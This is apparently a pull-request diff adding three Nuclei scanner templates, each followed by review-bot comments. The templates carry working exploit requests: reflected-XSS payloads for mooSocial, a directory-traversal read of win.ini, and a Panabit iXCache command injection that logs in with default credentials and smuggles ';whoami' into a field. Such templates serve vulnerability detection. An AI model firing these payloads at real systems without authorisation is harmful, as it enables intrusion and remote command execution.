Merge pull request #7889 from momika233/main
CVE-2023-4174/CVE-2023-4173/TerraMaster-RCE/panabit-ixcache-date-config-rcepatch-1
commit
864154f8a5
|
@ -0,0 +1,41 @@
|
|||
id: CVE-2023-4174
|
||||
|
||||
info:
|
||||
name: mooSocial 3.1.6 - Reflected Cross Site Scripting
|
||||
author: momika233
|
||||
severity: medium
|
||||
description: |
|
||||
A vulnerability has been found in mooSocial mooStore 3.1.6 and classified as problematic. Affected by this vulnerability is an unknown functionality. The manipulation leads to cross site scripting. The attack can be launched remotely.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/51671
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2023-4174
|
||||
- https://packetstormsecurity.com/files/174017/Social-Commerce-3.1.6-Cross-Site-Scripting.html
|
||||
metadata:
|
||||
max-request: 5
|
||||
verified: true
|
||||
fofa-query: icon_hash="702863115"
|
||||
tags: cve,cve2023,moosocial,xss
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/search/index?q="><img+src=a+onerror=alert(document.domain)>ridxm'
|
||||
- '{{BaseURL}}/stores"><img+src=a+onerror=alert(document.domain)>ridxm/all-products?store_id=&keyword=&price_from=&price_to=&rating=&store_category_id=&sortby=most_recent'
|
||||
- '{{BaseURL}}/user_info"><img+src=a+onerror=alert(document.domain)>ridxm/index/friends'
|
||||
- '{{BaseURL}}/faqs"><img+src=a+onerror=alert(document.domain)>ridxm/index?content_search="><img+src=a+onerror=alert(document.domain)>ridxm'
|
||||
- '{{BaseURL}}/classifieds"><img+src=a+onerror=alert(document.domain)>ridxm/search?category=1'
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "<img src=a onerror=alert(document.domain)>ridxm"
|
||||
- "mooSocial"
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
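Review bot: The `info` block of this CVE template has no `classification` section, and its `description` repeats the NVD wording ("an unknown functionality") even though the five `path` entries show which search parameters and path segments are reflected. I would add `classification:` with `cve-id: CVE-2023-4174` and `cwe-id: CWE-79`, so that results can be joined to vulnerability-management data. I would also reword the description to name the reflected inputs, so an operator triaging a hit knows what to check. A `remediation:` line is also missing; it should tell the operator to apply the vendor fix and to HTML-encode the reflected values on output.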
|
|
@ -0,0 +1,41 @@
|
|||
id: eaa-app-lfi
|
||||
|
||||
info:
|
||||
name: EAA Application Access System - Arbitary File Read
|
||||
author: momika233
|
||||
severity: high
|
||||
description: |
|
||||
There is an arbitrary file reading vulnerability in the VA virtual application platform of Tingzhi Technology, through which an attacker can obtain sensitive information in the server.
|
||||
reference:
|
||||
- https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E9%9C%86%E6%99%BA%E7%A7%91%E6%8A%80%20VA%E8%99%9A%E6%8B%9F%E5%BA%94%E7%94%A8%E5%B9%B3%E5%8F%B0%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md
|
||||
metadata:
|
||||
max-request: 1
|
||||
verified: true
|
||||
fofa-query: body="EAA益和应用接入系统"
|
||||
tags: eaa,lfi
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/windows/win.ini"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "bit app support"
|
||||
- "fonts"
|
||||
- "extensions"
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "application/octet-stream"
|
||||
- "filename=win.ini"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
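Review bot: The product identity is inconsistent within `info`. The `id`, `name` and `fofa-query` refer to the EAA application access system, while the `description` and the reference URL describe the VA virtual application platform of Tingzhi Technology. If these are the same product under two names, the description should say so; otherwise a finding cannot be mapped to an asset owner with confidence. The name also has a typo and should read `name: EAA Application Access System - Arbitrary File Read`. Because the probe and matchers only look for `win.ini`, the description could also state that the check covers Windows hosts only, so a clean result on another platform is not read as "not vulnerable".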
|
|
@ -0,0 +1,57 @@
|
|||
id: panabit-ixcache-rce
|
||||
|
||||
info:
|
||||
name: Panabit iXCache date_config - Remote Code Execution
|
||||
author: momika233
|
||||
severity: critical
|
||||
description: |
|
||||
Panabit iXCache date_config module has command splicing, resulting in the execution of arbitrary commands.
|
||||
reference:
|
||||
- https://github.com/Threekiii/Awesome-POC/blob/master/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/Panabit%20iXCache%20date_config%20%E5%90%8E%E5%8F%B0%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md
|
||||
- https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/iot/Panabit/Panabit%20iXCache%20date_config%20%E5%90%8E%E5%8F%B0%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md
|
||||
metadata:
|
||||
fofa-qeury: title="iXCache"
|
||||
veified: true
|
||||
max-request: 2
|
||||
tags: panabit,rce,ixcache,intrusive
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
POST /login/userverify.cgi HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
username={{username}}&password={{password}}
|
||||
|
||||
- |
|
||||
POST /cgi-bin/Maintain/date_config HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
ntpserver=0.0.0.0;whoami&year=2021&month=08&day=14&hour=17&minute=04&second=50&tz=Asiz&bcy=Shanghai&ifname=fxp1
|
||||
|
||||
cookie-reuse: true
|
||||
attack: pitchfork
|
||||
|
||||
payloads:
|
||||
username:
|
||||
- admin
|
||||
password:
|
||||
- ixcache
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
part: body
|
||||
regex:
|
||||
- "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+) groups=([0-9(a-z)]+)"
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
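Review bot: Two keys under `metadata` are misspelled (`fofa-qeury`, `veified`), so tooling that reads `fofa-query` and `verified` will treat this template as unverified and without a query; they should be `fofa-query: title="iXCache"` and `verified: true`. The regex matcher expects `uid=… gid=… groups=…`, which is the output format of `id`, but the second request runs `whoami`, so the matcher set looks unable to match even on a vulnerable device. The command and the regex need to agree, otherwise the template reports false negatives. The check also logs in with the `admin`/`ixcache` pair and posts a full date/NTP configuration, so the `name` and `description` should say that it is authenticated, depends on default credentials and may alter the device's time settings. The `intrusive` tag alone does not tell an operator that.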
|